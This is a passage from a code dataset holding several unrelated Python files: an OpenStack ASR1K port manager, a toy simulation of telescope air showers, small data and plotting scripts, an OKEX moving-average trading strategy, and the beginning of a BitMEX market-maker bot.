oslo_log import log as logging\nfrom oslo_utils import timeutils\nfrom asr1k_neutron_l3.models import asr1k_pair\nfrom asr1k_neutron_l3.models.netconf_yang import l2_interface\nfrom asr1k_neutron_l3.models.netconf_yang import efp_stats\nfrom asr1k_neutron_l3.common import utils\nfrom asr1k_neutron_l3.common.prometheus_monitor import PrometheusMonitor\n\nLOG = logging.getLogger(__name__)\n\n\ndef create_ports(ports, callback=None):\n LOG.debug(\"Starting a batch create of {} ports\".format(len(ports)))\n succeeded_ports = []\n failed_ports = []\n for port in ports:\n with PrometheusMonitor().port_create_duration.time():\n l2_port = Port(port)\n port_id = port.get('id')\n result = l2_port.create()\n if result:\n succeeded_ports.append(port_id)\n else:\n failed_ports.append(port_id)\n\n\n\n if callable(callback):\n callback(succeeded_ports, failed_ports)\n LOG.debug(\"Batch create of completed {}/{} ports successfully created\".format(len(succeeded_ports),len(ports)))\n return succeeded_ports\n\ndef update_ports(ports, callback=None):\n LOG.debug(\"Starting a batch update of {} ports\".format(len(ports)))\n succeeded_ports = []\n failed_ports = []\n\n for port in ports:\n with PrometheusMonitor().port_update_duration.time():\n port_id = port.get('id')\n\n l2_port = Port(port)\n result = l2_port.update()\n if result:\n succeeded_ports.append(port_id)\n else:\n failed_ports.append(port_id)\n\n\n if callable(callback):\n callback(succeeded_ports, failed_ports)\n LOG.debug(\"Batch update of completed {}/{} ports successfully updated\".format(len(succeeded_ports),len(ports)))\n return succeeded_ports\n\n\ndef delete_ports(port_extra_atts, callback=None):\n LOG.debug(\"Starting a batch delete of {} ports\".format(len(port_extra_atts)))\n succeeded_ports = []\n\n for port in port_extra_atts:\n with PrometheusMonitor().port_delete_duration.time():\n l2_port = Port(port)\n result = l2_port.delete()\n succeeded_ports.append(l2_port.id)\n\n\n\n if callable(callback):\n\n callback(succeeded_ports, [])\n LOG.debug(\"Batch delete of completed {}/{} ports successfully deleted\".format(len(succeeded_ports),len(port_extra_atts)))\n return succeeded_ports\n\n\nclass Port(object):\n\n def __init__(self, port_info):\n self.port_info = port_info\n self.config = asr1k_pair.ASR1KPair().config\n\n self.id = self.port_info.get('port_id')\n\n self.second_dot1q = self.port_info.get('second_dot1q')\n\n self.service_instance = utils.to_bridge_domain(self.second_dot1q)\n self.bridge_domain = utils.to_bridge_domain(self.second_dot1q)\n\n self.segmentation_id = self.port_info.get('segmentation_id')\n self.network_id = self.port_info.get('network_id')\n self.external_deleteable = self.port_info.get('external_deleteable')\n\n\n def _rest_definition(self):\n ext_interface = l2_interface.ExternalInterface(id=self.segmentation_id, description=\"Network : {}\".format(self.network_id),way=1,mode=\"symmetric\")\n lb_ext_interface = l2_interface.LoopbackExternalInterface(id=self.service_instance, description=\"Port : {}\".format(self.id),\n dot1q=self.segmentation_id, second_dot1q=self.second_dot1q,way=2,mode=\"symmetric\")\n lb_int_interface = l2_interface.LoopbackInternalInterface(id=self.service_instance, description=\"Port : {}\".format(self.id),\n bridge_domain=self.bridge_domain,\n dot1q=self.segmentation_id, second_dot1q=self.second_dot1q,way=2,mode=\"symmetric\")\n return ext_interface, lb_ext_interface, lb_int_interface\n\n def diff(self):\n ext_interface, lb_ext_interface, lb_int_interface = self._rest_definition()\n\n result = {}\n\n ext_diff = ext_interface.diff()\n if not ext_diff.valid:\n result[\"l2_external\"] = ext_diff.to_dict()\n\n lb_ext_diff = lb_ext_interface.diff()\n if not lb_ext_diff.valid:\n result[\"l2_external_lb\"] = lb_ext_diff.to_dict()\n\n lb_int_diff = lb_int_interface.diff()\n if not lb_int_diff.valid:\n result[\"l2_internal_lb\"] = lb_int_diff.to_dict()\n\n\n\n return result\n\n def get(self):\n\n ext_interface = l2_interface.ExternalInterface.get(self.segmentation_id)\n lb_ext_interface = l2_interface.LoopbackExternalInterface.get(self.service_instance)\n lb_int_interface = l2_interface.LoopbackInternalInterface.get(self.service_instance)\n\n\n return ext_interface,lb_ext_interface,lb_int_interface\n\n\n def get_stats(self):\n\n lb_ext_interface = efp_stats.LoopbackExternalEfpStats.get(id=self.service_instance)\n lb_int_interface = efp_stats.LoopbackInternalEfpStats.get(id=self.service_instance)\n\n return {\"external_lb\":lb_ext_interface.to_dict(),\"internal_lb\":lb_int_interface.to_dict()}\n\n\n def update(self,callback=None):\n failure = []\n success = [self.id]\n ext_interface, lb_ext_interface, lb_int_interface = self._rest_definition()\n\n result = ext_interface.update()\n\n if not result.success:\n failure.append(self.id)\n success = []\n\n result = lb_ext_interface.update()\n\n if not result.success:\n failure.append(self.id)\n success=[]\n\n result = lb_int_interface.update()\n\n if not result.success:\n failure.append(self.id)\n success = []\n\n\n if callable(callback):\n callback(success, failure)\n\n LOG.debug(\"Port {} update {}\".format(self.id,\"successfull\" if len(success) == 1 else \"failed\"))\n\n return len(success) == 1\n\n def create(self,callback=None):\n\n return self.update(callback)\n\n\n def delete(self, callback=None):\n\n ext_interface, lb_ext_interface, lb_int_interface = self._rest_definition()\n\n failure = []\n success = [self.id]\n\n # TODO only on last port on network\n if self.external_deleteable:\n result = ext_interface.delete()\n if not result.success:\n failure.append(self.id)\n success = []\n # For every port deletion\n result = lb_ext_interface.delete()\n if not result.success:\n failure.append(self.id)\n success = []\n result = lb_int_interface.delete()\n if not result.success:\n failure.append(self.id)\n success = []\n\n # TODO handle success/failure\n if callable(callback):\n callback([self.id], [])\n\n return len(success) == 1\n\n\n\n","sub_path":"asr1k_neutron_l3/models/neutron/l2/port.py","file_name":"port.py","file_ext":"py","file_size_in_byte":7493,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"481815919","text":"\"\"\"\nToy Model imaging a shower on an array of Cerenkov Telescopes and making a small Hillas reconstruction\nCopyright (C) 2016 Thomas Vuillaume\n\nThis program is free software: you can redistribute it and/or modify\nit under the terms of the GNU General Public License as published by\nthe Free Software Foundation, either version 3 of the License, or\n(at your option) any later version.\n\nThis program is distributed in the hope that it will be useful,\nbut WITHOUT ANY WARRANTY; without even the implied warranty of\nMERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\nGNU General Public License for more details.\n\nYou should have received a copy of the GNU General Public License\nalong with this program. If not, see \n\nThe author may be contacted @\nthomas.vuillaume@lapp.in2p3.fr\n\"\"\"\n\n\nimport sympy\nimport numpy as np\nfrom math import *\nfrom mpl_toolkits.mplot3d import Axes3D\nimport matplotlib.pyplot as plt\n\n\ndef linear_segment(shower_top, shower_bot, n):\n \"\"\"\n segment lineaire avec repartition homogene\n entree: points de depart et d'arrive, nb de points\n sortie: tableau de points\n \"\"\"\n vec = np.array(shower_top)-np.array(shower_bot)\n l = np.linspace(0,1,n)\n x = []\n for i in l:\n x.append(np.array(shower_top) - vec * i)\n return x\n\n\ndef random_surface_sphere(shower_center, shower_radius, n):\n \"\"\"\n cross representing shower\n entree: point-arrays, int\n sortie: array of point-arrays\n \"\"\"\n shower = []\n theta,phi = pi * np.random.random_sample(n), 2. * pi * np.random.random_sample(n)\n x = shower_center[0] + shower_radius * np.sin(theta) * np.cos(phi)\n y = shower_center[1] + shower_radius * np.sin(theta) * np.sin(phi)\n z = shower_center[2] + shower_radius * np.cos(theta)\n for i in np.arange(n):\n shower.append([x[i],y[i],z[i]])\n return shower\n\ndef random_surface_ellipsoide(shower_center, shower_length, shower_width, n):\n shower = []\n theta,phi = pi * np.random.random_sample(n), 2. * pi * np.random.random_sample(n)\n x = shower_center[0] + shower_width * np.sin(theta) * np.cos(phi)\n y = shower_center[1] + shower_width * np.sin(theta) * np.sin(phi)\n z = shower_center[2] + shower_length * np.cos(theta)\n for i in np.arange(n):\n shower.append([x[i],y[i],z[i]])\n return shower\n\ndef random_ellipsoide(shower_center, shower_length, shower_width, n):\n shower = []\n theta,phi = pi * np.random.random_sample(n), 2. * pi * np.random.random_sample(n)\n q,p = shower_length * np.random.random_sample(n), shower_width * np.random.random_sample(n)\n x = shower_center[0] + p * np.sin(theta) * np.cos(phi)\n y = shower_center[1] + p * np.sin(theta) * np.sin(phi)\n z = shower_center[2] + q * np.cos(theta)\n for i in np.arange(n):\n shower.append([x[i],y[i],z[i]])\n return shower\n\ndef plot3d(shower):\n X = []\n Y = []\n Z = []\n for points in shower:\n X.append(points[0])\n Y.append(points[1])\n Z.append(points[2])\n\n fig = plt.figure()\n ax = fig.add_subplot(111, projection='3d')\n ax.scatter(X, Y, Z)\n plt.show()\n","sub_path":"tests/shower.py","file_name":"shower.py","file_ext":"py","file_size_in_byte":3124,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"580025785","text":"users = {\n \"simone\" : \"active\",\n \"ciccio\" : \"inactive\",\n \"pippo\" : \"active\"\n}\n\nactive_users = {}\ninactive_users = {}\n\nfor user,status in users.items():\n if status == \"inactive\":\n inactive_users[user] = status\n else:\n active_users[user] = status\n\nprint(active_users)\nprint(inactive_users)\n","sub_path":"Flow_control_tools/for_statement.py","file_name":"for_statement.py","file_ext":"py","file_size_in_byte":317,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"102800384","text":"\"\"\"\n双均线策略\n此策略适用于OKEX的币本位合约\n如需用于其他类型合约或现货,可自行修改\nAuthor: Gary-Hertel\nDate: 2020/09/02\nemail: interstella.ranger2020@gmail.com\n\"\"\"\n\nfrom purequant.indicators import INDICATORS\nfrom purequant.trade import OKEXFUTURES\nfrom purequant.position import POSITION\nfrom purequant.market import MARKET\nfrom purequant.logger import logger\nfrom purequant.push import push\nfrom purequant.storage import storage\nfrom purequant.time import *\nfrom purequant.config import config\n\nclass Strategy:\n\n def __init__(self, instrument_id, time_frame, fast_length, slow_length, long_stop, short_stop, start_asset):\n config.loads('config.json') # 载入配置文件\n self.instrument_id = instrument_id # 合约ID\n self.time_frame = time_frame # k线周期\n self.exchange = OKEXFUTURES(config.access_key, config.secret_key, config.passphrase, self.instrument_id) # 初始化交易所\n self.position = POSITION(self.exchange, self.instrument_id, self.time_frame) # 初始化potion\n self.market = MARKET(self.exchange, self.instrument_id, self.time_frame) # 初始化market\n self.indicators = INDICATORS(self.exchange, self.instrument_id, self.time_frame) # 初始化indicators\n # 在第一次运行程序时,将初始资金数据保存至数据库中\n self.database = \"回测\" # 回测时必须为\"回测\"\n self.datasheet = self.instrument_id.split(\"-\")[0].lower() + \"_\" + time_frame\n if config.first_run:\n storage.mysql_save_strategy_run_info(self.database, self.datasheet, get_localtime(),\n \"none\", 0, 0, 0, 0, \"none\", 0, 0, 0, start_asset)\n # 读取数据库中保存的总资金数据\n self.total_asset = storage.read_mysql_datas(0, self.database, self.datasheet, \"总资金\", \">\")[-1][-1]\n self.total_profit = storage.read_mysql_datas(0, self.database, self.datasheet, \"总资金\", \">\")[-1][-2] # 策略总盈亏\n self.counter = 0 # 计数器\n self.fast_length = fast_length # 短周期均线长度\n self.slow_length = slow_length # 长周期均线长度\n self.long_stop = long_stop # 多单止损幅度\n self.short_stop = short_stop # 空单止损幅度\n self.contract_value = self.market.contract_value() # 合约面值,每次获取需发起网络请求,故于此处声明变量,优化性能\n print(\"{} {} 双均线多空策略已启动!\".format(get_localtime(), instrument_id)) # 程序启动时打印提示信息\n\n def begin_trade(self, kline=None):\n try:\n if self.indicators.CurrentBar(kline=kline) < self.slow_length: # 如果k线数据不够长就返回\n return\n timestamp = ts_to_datetime_str(utctime_str_to_ts(kline[-1][0])) if kline else get_localtime() # 非回测模式下时间戳就是当前本地时间\n # 计算策略信号\n ma = self.indicators.MA(self.fast_length, self.slow_length, kline=kline)\n fast_ma = ma[0]\n slow_ma = ma[1]\n cross_over = fast_ma[-2] >= slow_ma[-2] and fast_ma[-3] < slow_ma[-3] # 不用当根k线上的ma来计算信号,防止信号闪烁\n cross_below = slow_ma[-2] >= fast_ma[-2] and slow_ma[-3] < fast_ma[-3]\n if self.indicators.BarUpdate(kline=kline): # 如果k线更新,计数器归零\n self.counter = 0\n if self.counter < 1:\n # 按照策略信号开平仓\n if cross_over: # 金叉时\n if self.position.amount() == 0: # 若当前无持仓,则买入开多并推送下单结果\n price = self.market.open(-1, kline=kline) # 下单价格=此根k线收盘价\n amount = round(self.total_asset / self.contract_value) # 数量=总资金/价格/合约面值\n info = self.exchange.buy(price, amount)\n push(info)\n storage.mysql_save_strategy_run_info(self.database, self.datasheet, timestamp, \"买入开多\",\n price, amount, amount * self.contract_value, price,\n \"long\", amount, 0, self.total_profit, self.total_asset) # 将信息保存至数据库\n if self.position.direction() == 'short': # 若当前持空头,先平空再开多\n profit = self.position.covershort_profit(market_type=\"usd_contract\", last=self.market.open(-1, kline=kline)) # 在平空前先计算逻辑盈亏,当前最新成交价为开盘价\n self.total_profit += profit\n self.total_asset += profit # 计算此次盈亏后的总资金\n cover_short_price = self.market.open(-1, kline=kline)\n cover_short_amount = self.position.amount()\n open_long_price = self.market.open(-1, kline=kline)\n open_long_amount = round(self.total_asset / self.contract_value)\n info = self.exchange.BUY(cover_short_price, cover_short_amount, open_long_price, open_long_amount)\n push(\"此次盈亏:{} 当前总资金:{}\".format(profit, self.total_asset) + str(info)) # 需将返回的下单结果info转换为字符串后进行拼接\n storage.mysql_save_strategy_run_info(self.database, self.datasheet, timestamp, \"平空开多\",\n open_long_price, open_long_amount, open_long_amount * self.contract_value,\n open_long_price, \"long\", open_long_amount, profit, self.total_profit, self.total_asset)\n if cross_below: # 死叉时\n if self.position.amount() == 0:\n price = self.market.open(-1, kline=kline)\n amount = round(self.total_asset / self.contract_value)\n info = self.exchange.sellshort(price, amount)\n push(info)\n storage.mysql_save_strategy_run_info(self.database, self.datasheet, timestamp, \"卖出开空\",\n price, amount, amount * self.contract_value, price,\n \"short\", amount, 0, self.total_profit, self.total_asset)\n if self.position.direction() == 'long':\n profit = self.position.coverlong_profit(market_type=\"usd_contract\", last=self.market.open(-1, kline=kline)) # 在平多前先计算逻辑盈亏,当前最新成交价为开盘价\n self.total_profit += profit\n self.total_asset += profit\n cover_long_price = self.market.open(-1, kline=kline)\n cover_long_amount = self.position.amount()\n open_short_price = self.market.open(-1, kline=kline)\n open_short_amount = round(self.total_asset / self.contract_value)\n info = self.exchange.SELL(cover_long_price,\n cover_long_amount,\n open_short_price,\n open_short_amount)\n push(\"此次盈亏:{} 当前总资金:{}\".format(profit, self.total_asset) + str(info))\n storage.mysql_save_strategy_run_info(self.database, self.datasheet, timestamp, \"平多开空\",\n open_short_price, open_short_amount,\n open_short_amount * self.contract_value,\n open_short_price, \"short\", open_short_amount, profit, self.total_profit,\n self.total_asset)\n # 止损\n if self.position.amount() > 0:\n if self.position.direction() == 'long' and self.market.low(-1, kline=kline) <= self.position.price() * self.long_stop: # 多单止损\n profit = self.position.coverlong_profit(market_type=\"usd_contract\", last=self.position.price() * self.long_stop) # 在平多前先计算逻辑盈亏,当前最新成交价为止损价\n self.total_profit += profit\n self.total_asset += profit\n price = self.position.price() * self.long_stop\n amount = self.position.amount()\n info = self.exchange.sell(price, amount)\n push(\"此次盈亏:{} 当前总资金:{}\".format(profit, self.total_asset) + str(info))\n storage.mysql_save_strategy_run_info(self.database, self.datasheet, timestamp,\n \"卖出止损\", price, amount,\n amount * self.contract_value,\n 0, \"none\", 0, profit, self.total_profit,\n self.total_asset)\n self.counter += 1 # 计数器加1,控制此根k线上不再下单\n\n if self.position.direction() == 'short' and self.market.high(-1, kline=kline) >= self.position.price() * self.short_stop: # 空头止损\n profit = self.position.covershort_profit(market_type=\"usd_contract\", last=self.position.price() * self.short_stop)\n self.total_profit += profit\n self.total_asset += profit\n price = self.position.price() * self.short_stop\n amount = self.position.amount()\n info = self.exchange.buytocover(price, amount)\n push(\"此次盈亏:{} 当前总资金:{}\".format(profit, self.total_asset) + str(info))\n storage.mysql_save_strategy_run_info(self.database, self.datasheet, timestamp,\n \"买入止损\", price, amount,\n amount * self.contract_value,\n 0, \"none\", 0, profit, self.total_profit,\n self.total_asset)\n self.counter += 1\n except:\n logger.info()\n\nif __name__ == \"__main__\":\n\n # 实例化策略类\n instrument_id = \"EOS-USD-201225\"\n time_frame = \"1m\"\n strategy = Strategy(instrument_id=instrument_id, time_frame=time_frame, fast_length=5, slow_length=10, long_stop=0.98, short_stop=1.02, start_asset=30)\n\n if config.backtest: # 回测模式\n print(\"正在回测,可能需要一段时间,请稍后...\")\n start_time = get_cur_timestamp()\n records = []\n data = storage.read_purequant_server_datas(instrument_id.split(\"-\")[0].lower() + \"_\" + time_frame)\n for k in data:\n records.append(k)\n strategy.begin_trade(kline=records)\n cost_time = get_cur_timestamp() - start_time\n print(\"回测用时{}秒,结果已保存至mysql数据库!\".format(cost_time))\n else: # 实盘模式\n while True: # 循环运行begin_trade函数\n strategy.begin_trade()\n sleep(3) # 休眠几秒 ,防止请求频率超限","sub_path":"purequant/example/double_moving_average_strategy/usd_futures_double_ma_strategy.py","file_name":"usd_futures_double_ma_strategy.py","file_ext":"py","file_size_in_byte":11776,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"342389082","text":"# Jessica Chen\n# 11/24/2020\n# BMW Lab\n\n\nimport pandas as pd\nimport requests\nimport json\nimport matplotlib.pyplot as plt\nimport datetime\n\n\nurl = \"http://127.0.0.1:5000/v1/resources/query/\"\n\npayload=\"{\\n \\\"Collection\\\": \\\"IB\\\",\" \\\n \"\\n \\\"StartTime\\\": \\\"2020-10-01 00:00:00\\\",\" \\\n \"\\n \\\"EndTime\\\": \\\"2020-10-31 00:00:00\\\"\\n}\"\n\nheaders = {\n 'Content-Type': 'application/json'\n}\n\n\ndef read_data(url, payload, headers):\n response = requests.request(\"GET\", url, headers=headers, data=payload)\n resp_dict = json.loads(response.text)\n resp_array = resp_dict['result']\n data = pd.json_normalize(resp_array)\n return data\n\n\nif __name__ == '__main__':\n df = read_data(url, payload, headers)\n df = df.set_index(['UploadTime'])\n df.index = pd.to_datetime(df.index)\n df = df.resample('60min').sum()\n print(df)\n\n description = df.describe().transpose()\n print(description)\n\n plot_cols = ['Refilling', 'Heating', 'Cooling',\n 'HotTemp', 'TDS', 'WaterLevel', 'ColdTemp', 'WarmTemp', 'Usage_CC']\n plot_features = df[plot_cols]\n plot_features.index = df.index\n _ = plot_features.plot(subplots=True)\n plt.show()\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1181,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"169204261","text":"from __future__ import absolute_import\r\nfrom time import sleep\r\nimport sys\r\nimport datetime\r\nfrom datetime import datetime\r\nfrom os.path import getmtime\r\nimport random\r\nimport requests\r\nimport atexit\r\nimport signal\r\n\r\nfrom tiki_taka_bitmex.market_maker import bitmex\r\nfrom tiki_taka_bitmex.market_maker.settings import settings\r\nfrom tiki_taka_bitmex.market_maker.utils import log, constants, errors, math\r\nfrom tiki_taka_bitmex.market_maker.utils import getCandleAvgMoveBitmex, PriceCalclater\r\n\r\n# Used for reloading the bot - saves modified times of key files\r\nimport os\r\nwatched_files_mtimes = [(f, getmtime(f)) for f in settings.WATCHED_FILES]\r\n\r\nimport time\r\nimport threading\r\nimport winsound\r\n\r\n#파싱\r\nimport urllib.request\r\nimport urllib.parse\r\nimport json\r\n\r\nLEVERAGE = PriceCalclater.LEVERAGE[0] # 레버리지\r\nRECENT_PROFIT_TIME_GAP = 12 * 60 *60#12시간\r\nCOMMISION = PriceCalclater.COMMISSION\r\nserial = settings.SERIAL\r\n\r\n#현재 정보\r\nfloatBTCPrice = 1.0#가격\r\nintBalancePosition = 0 #잔고 USB0\r\nfloatDelta = 0.0\r\nLiqPrice = 0.0 #청산가\r\nfloatProfitRate = settings.floatProfitRate# 1%상승 했을 때 팔기\r\nAVG_MOVING_RANGE = settings.AVG_MOVING_RANGE\r\nLOSS_CUT_WAITING_TIME = settings.LOSS_CUT_WAITING_TIME\r\nfloatLossCutRate = settings.floatLossCutRate\r\nBuySigned = 0 #매수 체결량\r\nSellSigned = 0 #매도 체결량\r\n\r\n#수익\r\nfloatBalanceXBT = 0.0#잔고 xbt\r\nfloatBalanceXBTFirst = 0.0#매수 전에\r\nfloatBalanceXBTSecond = 0.0#매도 후에\r\n\r\n#구동에 필요\r\nstart_state = 0 #0구동, 1일시정지, 2즉시중지 ,3팔고중지\r\nis_now_chking_profit = False #그날 익절률 계산중인지?\r\nrecent_profit_time = 0 #익절률 얻어오기\r\nrecent_process_time = 0 #작업 제대로 되고 있나요\r\nis_thread_start = False\r\nSYMBOL = settings.SYMBOL\r\nRURNNING = 0\r\nPAUSE = 1\r\nSTOP_NOW = 2\r\nSTOP_AFTER_SELL = 3\r\n\r\nis_Long = False\r\n#매매 예상\r\narrPosition = [0] * PriceCalclater.POSITION_CNT # 매수 포지션 ㅇ\r\narrWeight = [0] * PriceCalclater.POSITION_CNT # 매수 비중 ㅇ\r\narrWeightSum = [0] * PriceCalclater.POSITION_CNT # 매수 비중 합, 들어간돈\r\narrWeightRate = [0] * PriceCalclater.POSITION_CNT # 매수 비중 비율 ㅇ\r\narrAvgPosition = [0] * PriceCalclater.POSITION_CNT # 평단가 ㅇ\r\narrProfitPosition = [0] * PriceCalclater.POSITION_CNT # 이익률 가격\r\narrProfitRateReal = [0] * PriceCalclater.POSITION_CNT # 실제 청산 상승률\r\narrProfit = [0] * PriceCalclater.POSITION_CNT # 익절 대금\r\narrProfitRate = [0] * PriceCalclater.POSITION_CNT # 익절률\r\narrMargincallPosition = [0] * PriceCalclater.POSITION_CNT # 청산가격\r\narrMargincallFromNowRate = [0] * PriceCalclater.POSITION_CNT # 매수가 대비 청산가 남은 하락률\r\narrMargincallOK = [False] * PriceCalclater.POSITION_CNT # 청산가< 매수가\r\narrDecreaseRange = [0] * PriceCalclater.POSITION_CNT # 청산가 하락률\r\narrMaxRate = PriceCalclater.arrMaxRate[0]\r\n\r\nintPurchasePrice = 0 # 매수가\r\n#intPurchasePriceCnt = 0 #몇번째까지 샀는지\r\nintAvgPurchasePrice = 0 #평단\r\nintContractPosition = 0 #매수량, 매수 포지션\r\nintLastOrderPrice = 0 #최근 주문가; 청산가 보다 높아야되서\r\nintSellPrice = 0 #매도가\r\nfloatTotalProfit = 0 #이득\r\nfloatTotalProfitRate = 0 #손익률\r\nintLowPriceRate = 0 #몇퍼까지 내려갔었는지\r\nisNowTrade = False\r\nisExitImmed = False\r\nisExitNextTime = False\r\nisMarginCallActivated = False\r\nintNowBTCcnt = 0\r\nstrPurchaseTime = \"\"\r\n#---------방어코드\r\n#There will be no same price in 15 times that means error\r\nintPriceSave = 0.0\r\nintPriceSaveCnt = 0\r\nPRICE_SAVE_CNT_LIMIT = settings.PRICE_SAVE_CNT_LIMIT\r\nis_restart = False\r\n\r\n#\r\n# Helpers\r\n#\r\n\r\nlogger = log.setup_custom_logger('root')\r\n\r\n\r\nclass ExchangeInterface:\r\n def __init__(self, dry_run=False):\r\n self.dry_run = dry_run\r\n if len(sys.argv) > 1:\r\n self.symbol = sys.argv[1]\r\n else:\r\n self.symbol = settings.SYMBOL\r\n self.bitmex = bitmex.BitMEX(base_url=settings.BASE_URL, symbol=self.symbol,\r\n apiKey=settings.API_KEY, apiSecret=settings.API_SECRET,\r\n orderIDPrefix=settings.ORDERID_PREFIX, postOnly=settings.POST_ONLY,\r\n timeout=settings.TIMEOUT)\r\n\r\n def cancel_order(self, order):\r\n tickLog = self.get_instrument()['tickLog']\r\n logger.info(\"Canceling: %s %d @ %.*f\" % (order['side'], order['orderQty'], tickLog, order['price']))\r\n while True:\r\n try:\r\n self.bitmex.cancel(order['orderID'])\r\n sleep(settings.API_REST_INTERVAL)\r\n except ValueError as e:\r\n logger.info(e)\r\n sleep(settings.API_ERROR_INTERVAL)\r\n else:\r\n break\r\n\r\n def cancel_all_orders(self):\r\n if self.dry_run:\r\n return\r\n\r\n logger.info(\"Resetting current position. Canceling all existing orders.\")\r\n tickLog = self.get_instrument()['tickLog']\r\n # print(tickLog)\r\n # In certain cases, a WS update might not make it through before we call this.\r\n # For that reason, we grab via HTTP to ensure we grab them all.\r\n orders = self.bitmex.http_open_orders()\r\n # print(orders)\r\n for order in orders:\r\n logger.info(\"Canceling: %s %d @ %.*f\" % (order['side'], order['orderQty'], tickLog, order['price']))\r\n\r\n if len(orders):\r\n self.bitmex.cancel([order['orderID'] for order in orders])\r\n\r\n sleep(settings.API_REST_INTERVAL)\r\n\r\n def get_portfolio(self):\r\n contracts = settings.CONTRACTS\r\n portfolio = {}\r\n for symbol in contracts:\r\n position = self.bitmex.position(symbol=symbol)\r\n instrument = self.bitmex.instrument(symbol=symbol)\r\n\r\n if instrument['isQuanto']:\r\n future_type = \"Quanto\"\r\n elif instrument['isInverse']:\r\n future_type = \"Inverse\"\r\n elif not instrument['isQuanto'] and not instrument['isInverse']:\r\n future_type = \"Linear\"\r\n else:\r\n raise NotImplementedError(\"Unknown future type; not quanto or inverse: %s\" % instrument['symbol'])\r\n\r\n if instrument['underlyingToSettleMultiplier'] is None:\r\n multiplier = float(instrument['multiplier']) / float(instrument['quoteToSettleMultiplier'])\r\n else:\r\n multiplier = float(instrument['multiplier']) / float(instrument['underlyingToSettleMultiplier'])\r\n\r\n portfolio[symbol] = {\r\n \"currentQty\": float(position['currentQty']),\r\n \"futureType\": future_type,\r\n \"multiplier\": multiplier,\r\n \"markPrice\": float(instrument['markPrice']),\r\n \"spot\": float(instrument['indicativeSettlePrice'])\r\n }\r\n\r\n return portfolio\r\n\r\n def calc_delta(self):\r\n \"\"\"Calculate currency delta for portfolio\"\"\"\r\n portfolio = self.get_portfolio()\r\n spot_delta = 0\r\n mark_delta = 0\r\n for symbol in portfolio:\r\n item = portfolio[symbol]\r\n if item['futureType'] == \"Quanto\":\r\n spot_delta += item['currentQty'] * item['multiplier'] * item['spot']\r\n mark_delta += item['currentQty'] * item['multiplier'] * item['markPrice']\r\n elif item['futureType'] == \"Inverse\":\r\n spot_delta += (item['multiplier'] / item['spot']) * item['currentQty']\r\n mark_delta += (item['multiplier'] / item['markPrice']) * item['currentQty']\r\n elif item['futureType'] == \"Linear\":\r\n spot_delta += item['multiplier'] * item['currentQty']\r\n mark_delta += item['multiplier'] * item['currentQty']\r\n basis_delta = mark_delta - spot_delta\r\n delta = {\r\n \"spot\": spot_delta,\r\n \"mark_price\": mark_delta,\r\n \"basis\": basis_delta\r\n }\r\n return delta\r\n\r\n def get_delta(self, symbol=None):\r\n if symbol is None:\r\n symbol = self.symbol\r\n return self.get_position(symbol)['currentQty']\r\n\r\n def get_instrument(self, symbol=None):\r\n if symbol is None:\r\n symbol = self.symbol\r\n return self.bitmex.instrument(symbol)\r\n\r\n def get_margin(self):\r\n if self.dry_run:\r\n return {'marginBalance': float(settings.DRY_BTC), 'availableFunds': float(settings.DRY_BTC)}\r\n return self.bitmex.funds()\r\n\r\n def get_orders(self):\r\n if self.dry_run:\r\n return []\r\n return self.bitmex.open_orders()\r\n\r\n def get_highest_buy(self):\r\n buys = [o for o in self.get_orders() if o['side'] == 'Buy']\r\n if not len(buys):\r\n return {'price': -2**32}\r\n highest_buy = max(buys or [], key=lambda o: o['price'])\r\n return highest_buy if highest_buy else {'price': -2**32}\r\n\r\n def get_lowest_sell(self):\r\n sells = [o for o in self.get_orders() if o['side'] == 'Sell']\r\n if not len(sells):\r\n return {'price': 2**32}\r\n lowest_sell = min(sells or [], key=lambda o: o['price'])\r\n return lowest_sell if lowest_sell else {'price': 2**32} # ought to be enough for anyone\r\n\r\n def get_position(self, symbol=None):\r\n if symbol is None:\r\n symbol = self.symbol\r\n return self.bitmex.position(symbol)\r\n\r\n def get_ticker(self, symbol=None):\r\n if symbol is None:\r\n symbol = self.symbol\r\n return self.bitmex.ticker_data(symbol)\r\n\r\n def is_open(self):\r\n \"\"\"Check that websockets are still open.\"\"\"\r\n return not self.bitmex.ws.exited\r\n\r\n def check_market_open(self):\r\n instrument = self.get_instrument()\r\n if instrument[\"state\"] != \"Open\" and instrument[\"state\"] != \"Closed\":\r\n raise errors.MarketClosedError(\"The instrument %s is not open. State: %s\" %\r\n (self.symbol, instrument[\"state\"]))\r\n\r\n def check_if_orderbook_empty(self):\r\n \"\"\"This function checks whether the order book is empty\"\"\"\r\n instrument = self.get_instrument()\r\n if instrument['midPrice'] is None:\r\n raise errors.MarketEmptyError(\"Orderbook is empty, cannot quote\")\r\n\r\n def amend_bulk_orders(self, orders):\r\n if self.dry_run:\r\n return orders\r\n return self.bitmex.amend_bulk_orders(orders)\r\n\r\n def create_bulk_orders(self, orders):\r\n if self.dry_run:\r\n return orders\r\n return self.bitmex.create_bulk_orders(orders)\r\n\r\n def cancel_bulk_orders(self, orders):\r\n if self.dry_run:\r\n return orders\r\n return self.bitmex.cancel([order['orderID'] for order in orders])\r\n\r\n#######################################내가짠코딩###########################################\r\n def update_margin(self, syb, leverage):\r\n return self.bitmex.isolate_margin(syb, leverage)\r\n\r\nclass OrderManager:\r\n def __init__(self):\r\n self.exchange = ExchangeInterface(settings.DRY_RUN)\r\n # Once exchange is created, register exit handler that will always cancel orders\r\n # on any error.\r\n atexit.register(self.exit)\r\n signal.signal(signal.SIGTERM, self.exit)\r\n\r\n logger.info(\"Using symbol %s.\" % self.exchange.symbol)\r\n\r\n if settings.DRY_RUN:\r\n logger.info(\"Initializing dry run. Orders printed below represent what would be posted to BitMEX.\")\r\n else:\r\n logger.info(\"Order Manager initializing, connecting to BitMEX. Live run: executing real trades.\")\r\n\r\n self.start_time = datetime.now()\r\n self.instrument = self.exchange.get_instrument()\r\n self.starting_qty = self.exchange.get_delta()\r\n self.running_qty = self.starting_qty\r\n self.reset()\r\n\r\n def reset(self):\r\n self.exchange.cancel_all_orders()\r\n self.sanity_check()\r\n 